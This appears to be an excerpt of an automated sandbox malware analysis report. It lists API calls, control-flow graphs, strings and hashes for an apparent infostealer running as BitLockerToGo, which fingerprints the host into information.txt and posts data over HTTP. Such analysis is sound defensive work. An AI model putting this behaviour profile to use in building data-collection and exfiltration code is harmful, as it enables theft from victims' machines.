1826->1825 1827 2a065cc-2a065fc call 2a12265 call 2a121e9 call 2a02910 1826->1827 1827->1824
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12175: lstrcpy.KERNEL32(00000000,?), ref: 02A12194
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A049DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04A10
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A049DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04A16
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A049DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04A1C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A049DE: lstrlen.KERNEL32(000000FF,00000000,?), ref: 02A04A2E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A049DE: InternetCrackUrlA.WININET(000000FF,00000000), ref: 02A04A36
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12143: lstrcpy.KERNEL32(00000000,00000000), ref: 02A12169
                                                                                                                                                                                                                                                                                                                                                          • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 02A05F00
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?), ref: 02A05F1E
                                                                                                                                                                                                                                                                                                                                                          • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02A060B6
                                                                                                                                                                                                                                                                                                                                                          • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 02A060FA
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(?,",mode,02A38AA0,------,02A38A94,27536a38d3707b6600f28b9d7177a12c,",build_id,02A38A7C,------,02A38A70,",02A38A64,------), ref: 02A06529
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(?), ref: 02A06538
                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02A06542
                                                                                                                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 02A06549
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(?), ref: 02A06556
                                                                                                                                                                                                                                                                                                                                                          • _memmove.LIBCMT ref: 02A06564
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(?), ref: 02A06572
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(?,?,00000000), ref: 02A06580
                                                                                                                                                                                                                                                                                                                                                          • _memmove.LIBCMT ref: 02A0658D
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(?,?,00000000), ref: 02A065A2
                                                                                                                                                                                                                                                                                                                                                          • HttpSendRequestA.WININET(?,?,00000000), ref: 02A065B5
                                                                                                                                                                                                                                                                                                                                                          • InternetReadFile.WININET(?,?,000000C7,?), ref: 02A06616
                                                                                                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 02A06626
                                                                                                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 02A06632
                                                                                                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 02A06644
                                                                                                                                                                                                                                                                                                                                                          • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 02A0612C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrlen.KERNEL32(?,?,?,02A18FD9,abc_,00000000,02A37786,?,?,?,?,02A19D6E), ref: 02A12279
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcpy.KERNEL32(00000000,?), ref: 02A122A1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcat.KERNEL32(?,00000000), ref: 02A122AC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A121E9: lstrcpy.KERNEL32(00000000,?), ref: 02A12219
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12223: lstrcpy.KERNEL32(00000000,?), ref: 02A12251
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12223: lstrcat.KERNEL32(?,?), ref: 02A1225B
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Internetlstrlen$lstrcpy$CloseHandle$HeapHttpOpenRequest_memmovelstrcat$AllocateConnectCrackFileOptionProcessReadSend
                                                                                                                                                                                                                                                                                                                                                          • String ID: "$"$"$------$------$------$------$27536a38d3707b6600f28b9d7177a12c$build_id$mode
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3306106941-2461365301
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: baeae788159faf54cdd2fa942c73b25e1423938ccbdb702b1bbeb0ccf616104e
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 3611a04b5e2b7a9292b754326624c8ee6b679642c673d10d153219815b14c6d2
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: baeae788159faf54cdd2fa942c73b25e1423938ccbdb702b1bbeb0ccf616104e
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F5229231D8017D9ADF61EB61EE85BCDB776AF04310F0185E2AA0973160DE71AF9A8F50
                                                                                                                                                                                                                                                                                                                                                          Function 02A158C3 Relevance: 49.7, APIs: 2, Strings: 26, Instructions: 674stringCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 1833 2a158c3-2a162e2 call 2a12143 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a1291c call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a13230 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a132e0 call 2a12223 call 2a121e9 call 2a02910 * 2 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a125fe call 2a12223 call 2a121e9 call 2a02910 * 2 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 GetCurrentProcessId call 2a13ee1 call 2a12223 call 2a121e9 call 2a02910 * 2 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a1278c call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a13463 call 2a12223 call 2a121e9 call 2a02910 * 2 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a135f3 call 2a12223 call 2a121e9 call 2a02910 * 2 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a128e1 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a128af call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a131bf call 2a12223 call 2a121e9 call 2a02910 * 2 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12a37 call 2a12223 call 2a121e9 call 2a02910 * 2 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a1291c call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a1298a call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12bad call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12c63 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12c16 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12d75 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12dee call 2a12223 call 2a121e9 call 2a02910 * 2 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a13101 call 2a12223 call 2a121e9 call 2a02910 * 2 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12e5f call 2a12223 call 2a121e9 call 2a02910 * 2 call 2a12e5f call 2a12223 call 2a121e9 call 2a02910 * 2 call 2a12265 call 2a121e9 call 2a02910 call 2a01ced lstrlen call 2a12143 call 2a18be6 call 2a02910 * 2 call 2a01cce
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12143: lstrcpy.KERNEL32(00000000,00000000), ref: 02A12169
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrlen.KERNEL32(?,?,?,02A18FD9,abc_,00000000,02A37786,?,?,?,?,02A19D6E), ref: 02A12279
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcpy.KERNEL32(00000000,?), ref: 02A122A1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcat.KERNEL32(?,00000000), ref: 02A122AC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A121E9: lstrcpy.KERNEL32(00000000,?), ref: 02A12219
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A1291C: GetProcessHeap.KERNEL32(00000000,00000104,?,Version: ,02A3761F,?,?,?), ref: 02A12934
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A1291C: RtlAllocateHeap.NTDLL(00000000), ref: 02A1293B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A1291C: GetLocalTime.KERNEL32(?), ref: 02A12947
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A1291C: wsprintfA.USER32 ref: 02A12972
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A13230: _memset.LIBCMT ref: 02A13263
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A13230: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 02A13282
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A13230: RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 02A132A7
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A13230: RegCloseKey.ADVAPI32(?,?,?,?), ref: 02A132B3
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A13230: CharToOemA.USER32(?,?), ref: 02A132C7
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A132E0: GetCurrentHwProfileA.ADVAPI32(?), ref: 02A132FB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A132E0: _memset.LIBCMT ref: 02A1332A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A132E0: lstrcat.KERNEL32(?,00000000), ref: 02A13352
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A132E0: lstrcat.KERNEL32(?,02A37E68), ref: 02A1336F
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12223: lstrcpy.KERNEL32(00000000,?), ref: 02A12251
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12223: lstrcat.KERNEL32(?,?), ref: 02A1225B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A125FE: GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 02A12631
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A125FE: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 02A12671
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A125FE: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 02A126C6
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A125FE: RtlAllocateHeap.NTDLL(00000000), ref: 02A126CD
                                                                                                                                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(Path: ,02A378BC,HWID: ,02A378B0,GUID: ,02A378A4,00000000,MachineID: ,02A37894,00000000,Date: ,02A37888,02A37884,11.7,Version: ,02A3761F), ref: 02A15B18
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A13EE1: OpenProcess.KERNEL32(00000410,00000000,02A15B27,00000000,?), ref: 02A13F03
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A13EE1: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 02A13F1E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A13EE1: CloseHandle.KERNEL32(00000000), ref: 02A13F25
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A1278C: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,02A15BD2,Windows: ,02A378E0), ref: 02A127A0
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A1278C: RtlAllocateHeap.NTDLL(00000000), ref: 02A127A7
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A13463: __EH_prolog3_catch_GS.LIBCMT ref: 02A1346A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A13463: CoInitializeEx.COMBASE(00000000,00000000), ref: 02A1347B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A13463: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 02A1348C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A13463: CoCreateInstance.COMBASE(02A33F70,00000000,00000001,02A33EA0,?), ref: 02A134A6
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A13463: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 02A134DC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A13463: VariantInit.OLEAUT32(?), ref: 02A13537
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A135F3: __EH_prolog3_catch.LIBCMT ref: 02A135FA
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A135F3: CoInitializeEx.COMBASE(00000000,00000000), ref: 02A13609
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A135F3: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 02A1361A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A135F3: CoCreateInstance.COMBASE(02A33F70,00000000,00000001,02A33EA0,?), ref: 02A13634
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A135F3: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 02A1366A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A135F3: VariantInit.OLEAUT32(?), ref: 02A136B9
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A128E1: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,02A01375), ref: 02A128ED
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A128E1: RtlAllocateHeap.NTDLL(00000000), ref: 02A128F4
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A128E1: GetComputerNameA.KERNEL32(00000000,02A01375), ref: 02A12908
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A128AF: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,02A013A9), ref: 02A128BB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A128AF: RtlAllocateHeap.NTDLL(00000000), ref: 02A128C2
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A128AF: GetUserNameA.ADVAPI32(00000000,02A013A9), ref: 02A128D6
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A131BF: CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 02A131D1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A131BF: GetDeviceCaps.GDI32(00000000,00000008), ref: 02A131DC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A131BF: GetDeviceCaps.GDI32(00000000,0000000A), ref: 02A131E7
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A131BF: ReleaseDC.USER32(00000000,00000000), ref: 02A131F2
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A131BF: GetProcessHeap.KERNEL32(00000000,00000104,?,?,02A15DD5,?,Display Resolution: ,02A37934,00000000,User Name: ,02A37924,00000000,Computer Name: ,02A37910,AV: ,02A37904), ref: 02A131FE
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A131BF: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 02A13205
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A131BF: wsprintfA.USER32 ref: 02A13217
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12A37: GetKeyboardLayoutList.USER32(00000000,00000000,02A37812,?,?), ref: 02A12A68
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12A37: LocalAlloc.KERNEL32(00000040,00000000), ref: 02A12A76
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12A37: GetKeyboardLayoutList.USER32(00000000,00000000), ref: 02A12A84
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12A37: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 02A12AB3
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12A37: LocalFree.KERNEL32(00000000), ref: 02A12B5B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A1298A: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 02A129A5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A1298A: RtlAllocateHeap.NTDLL(00000000), ref: 02A129AC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A1298A: GetTimeZoneInformation.KERNEL32(?), ref: 02A129BB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A1298A: wsprintfA.USER32 ref: 02A129D9
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12BAD: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,02A15F8F,Processor: ,[Hardware],02A37990,00000000,TimeZone: ,02A37980,00000000,Local Time: ,02A3796C), ref: 02A12BC1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12BAD: RtlAllocateHeap.NTDLL(00000000), ref: 02A12BC8
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12BAD: RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,02A378C8,?,?,?,02A15F8F,Processor: ,[Hardware],02A37990,00000000,TimeZone: ,02A37980,00000000,Local Time: ), ref: 02A12BE6
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12BAD: RegQueryValueExA.KERNEL32(02A378C8,00000000,00000000,00000000,000000FF,?,?,?,02A15F8F,Processor: ,[Hardware],02A37990,00000000,TimeZone: ,02A37980,00000000), ref: 02A12C02
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12BAD: RegCloseKey.ADVAPI32(02A378C8,?,?,?,02A15F8F,Processor: ,[Hardware],02A37990,00000000,TimeZone: ,02A37980,00000000,Local Time: ,02A3796C,Keyboard Languages: ,02A37950), ref: 02A12C0B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12C63: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,?), ref: 02A12CD9
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12C63: wsprintfA.USER32 ref: 02A12D37
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12C16: GetSystemInfo.KERNEL32(?), ref: 02A12C30
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12C16: wsprintfA.USER32 ref: 02A12C48
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12D75: GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,02A37950,Display Resolution: ,02A37934,00000000,User Name: ,02A37924,00000000,Computer Name: ,02A37910,AV: ,02A37904,Install Date: ), ref: 02A12D8D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12D75: RtlAllocateHeap.NTDLL(00000000), ref: 02A12D94
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12D75: GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 02A12DB0
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12D75: wsprintfA.USER32 ref: 02A12DD6
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12DEE: EnumDisplayDevicesA.USER32(00000000,00000000,?,00000001), ref: 02A12E45
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A13101: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,02A37817,?,?), ref: 02A13130
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A13101: Process32First.KERNEL32(00000000,00000128), ref: 02A13140
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A13101: Process32Next.KERNEL32(00000000,00000128), ref: 02A1319E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A13101: CloseHandle.KERNEL32(00000000), ref: 02A131A9
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12E5F: RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,02A37816,00000000,?,?), ref: 02A12ECF
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12E5F: RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 02A12F0C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12E5F: wsprintfA.USER32 ref: 02A12F39
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12E5F: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 02A12F58
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12E5F: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 02A12F8E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12E5F: lstrlen.KERNEL32(?), ref: 02A12FA3
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12E5F: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,02A37E28), ref: 02A13038
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12E5F: RegCloseKey.ADVAPI32(?), ref: 02A130A2
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12E5F: RegCloseKey.ADVAPI32(?), ref: 02A130CE
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,Keyboard Languages: ,02A37950,Display Resolution: ,02A37934,00000000,User Name: ,02A37924,00000000), ref: 02A162A0
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A18BE6: CreateThread.KERNEL32(00000000,00000000,02A18B15,?,00000000,00000000), ref: 02A18C85
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A18BE6: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 02A18C8D
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$Process$Allocate$wsprintf$Close$CreateOpen$InitializeQueryValuelstrcatlstrcpy$InformationLocalNamelstrlen$BlanketCapsCurrentDeviceEnumHandleInfoInitInstanceKeyboardLayoutListProcess32ProxySecurityTimeVariant_memset$AllocCharComputerDevicesDirectoryDisplayFileFirstFreeGlobalH_prolog3_catchH_prolog3_catch_LocaleLogicalMemoryModuleNextObjectProcessorProfileReleaseSingleSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZone
                                                                                                                                                                                                                                                                                                                                                          • String ID: 11.7$AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2795203874-2308926046
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: a992286b4004b1be4509ba78b5cdebdc47fb30b6c1b9f570d51946ed3e6cce2f
